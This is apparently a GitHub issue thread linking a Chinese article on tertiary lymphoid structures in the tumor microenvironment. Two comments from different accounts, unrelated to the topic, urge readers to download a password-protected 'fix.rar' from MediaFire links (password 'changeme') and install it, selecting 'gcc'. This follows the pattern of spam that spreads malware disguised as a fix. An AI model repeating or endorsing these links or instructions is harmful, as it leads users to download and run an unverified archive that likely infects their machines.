### ISSUE TITLE
肿瘤微环境中的免疫堡垒：三级淋巴结构（TLSs）

### ISSUE THREAD

**Issue by ixxmu** [ixxmu/mp_duty#5499]
https://mp.weixin.qq.com/s/TX1-iohx-vRPfS_HqakMBA

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
